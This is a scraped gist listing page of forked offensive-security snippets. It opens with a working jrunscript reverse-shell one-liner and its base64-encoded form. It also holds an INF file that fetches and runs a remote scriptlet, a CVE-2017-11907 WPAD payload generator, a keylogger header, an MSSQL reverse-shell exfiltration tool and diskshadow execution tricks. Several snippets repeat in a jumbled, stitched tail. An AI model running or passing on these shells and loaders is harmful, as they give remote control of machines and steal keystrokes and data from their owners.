sasqwatch

## JVM_POST_EXPLOIT.md

      
              1 file
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                sasqwatch
                / JVM_POST_EXPLOIT.md
            
            
              Created
              January 30, 2018 19:41
                — forked from frohoff/JVM_POST_EXPLOIT.md
            
              
                JVM Post-Exploitation One-Liners
              
          
    Nashorn / Rhino:

Reverse Shell

$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'

Reverse Shell (Base-64 encoded)

$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V

  
## README.md

      
              4 files
            
          
              0 forks
            
          
              0 comments
            
          
              0 stars
            
          
                sasqwatch
                / README.md
            
            
              Created
              February 26, 2018 20:30
                — forked from jthuraisamy/README.md
            
              
                CVE-2017-11907 WPAD.dat Generator for Responder
              
          
    Usage

This script generates a payload for use with Responder.

Generate a payload with main.py
Copy and paste the one-liner output into the WPADScript field of Responder.conf.

test@test:~$ python3 main.py --help
usage: main.py [-h] [-o OUT] cmd


## InstallUtilMouseKeyLogger.cs
using System;
using System.IO;
using System.Diagnostics;
using System.Windows.Forms;
using System.Configuration.Install;
using System.Runtime.InteropServices;
//KeyStroke Mouse Clicks Code
/*
 * https://code.google.com/p/klog-sharp/
*/

## docker_kill.sh
docker ps | awk {' print $1 '} | tail -n+2 > tmp.txt; for line in $(cat tmp.txt); do docker kill $line; done; rm tmp.txt

## mandros.py
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler

'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
'''

## Insomnihack_Teaser_2017_winworld_exploit.py
# Insomni'hack Teaser 2017 "winworld" task exploit
#
# Author:    Mateusz "j00ru" Jurczyk
# Date:      21 January 2017
#
import os
import random
import string
import sys
import struct

## WCTF_2018_searchme_exploit.cpp
// WCTF 2018 "searchme" task exploit
//
// Author:    Mateusz "j00ru" Jurczyk
// Date:      6 July 2018
// Tested on: Windows 10 1803 (10.0.17134.165)
//
// See also:  https://j00ru.vexillium.org/2018/07/exploiting-a-windows-10-pagedpool-off-by-one/
#include <Windows.h>
#include <winternl.h>
#include <ntstatus.h>

## diskshadow.txt
Execute
=======

*Interactive Mode

cmd.exe
c:\windows\system32\diskshadow.exe
> exec calc.exe
> exec "cmd.exe" /c calc.exe
> exit

## ieuinit.inf

[version]
signature="$CHICAGO$"
AdvancedINF=2.0

[DefaultInstall.Windows7]
UnRegisterOCXs=FunRun

[FunRun]
%11%\scrobj.dll,NI,https://gist.githubusercontent.com/bohops/6ded40c4989c673f2e30b9a6c1985019/raw/33dc4cae00a10eb86c02b561b1c832df6de40ef6/test.sct

## calc_exe.inf
; DRIVER.INF
; Copyright (c) Microsoft Corporation.  All rights reserved.

[Version]
Signature = "$CHICAGO$"
Class=61883
ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}
Provider=%Msft%
DriverVer=06/21/2006,6.1.7600.16385
	using System;
	using System.IO;
	using System.Diagnostics;
	using System.Windows.Forms;
	using System.Configuration.Install;
	using System.Runtime.InteropServices;
	//KeyStroke Mouse Clicks Code
	/*
	* https://code.google.com/p/klog-sharp/
	*/
	import sys
	import requests
	import threading
	import HTMLParser
	from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler

	'''
	Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
	Author: @xassiz
	'''
	# Insomni'hack Teaser 2017 "winworld" task exploit
	#
	# Author: Mateusz "j00ru" Jurczyk
	# Date: 21 January 2017
	#
	import os
	import random
	import string
	import sys
	import struct
	// WCTF 2018 "searchme" task exploit
	//
	// Author: Mateusz "j00ru" Jurczyk
	// Date: 6 July 2018
	// Tested on: Windows 10 1803 (10.0.17134.165)
	//
	// See also: https://j00ru.vexillium.org/2018/07/exploiting-a-windows-10-pagedpool-off-by-one/
	#include <Windows.h>
	#include <winternl.h>
	#include <ntstatus.h>
	Execute
	=======

	*Interactive Mode

	cmd.exe
	c:\windows\system32\diskshadow.exe
	> exec calc.exe
	> exec "cmd.exe" /c calc.exe
	> exit

	[version]
	signature="$CHICAGO$"
	AdvancedINF=2.0

	[DefaultInstall.Windows7]
	UnRegisterOCXs=FunRun

	[FunRun]
	%11%\scrobj.dll,NI,https://gist.githubusercontent.com/bohops/6ded40c4989c673f2e30b9a6c1985019/raw/33dc4cae00a10eb86c02b561b1c832df6de40ef6/test.sct
	; DRIVER.INF
	; Copyright (c) Microsoft Corporation. All rights reserved.

	[Version]
	Signature = "$CHICAGO$"
	Class=61883
	ClassGuid={7EBEFBC0-3200-11d2-B4C2-00A0C9697D17}
	Provider=%Msft%
	DriverVer=06/21/2006,6.1.7600.16385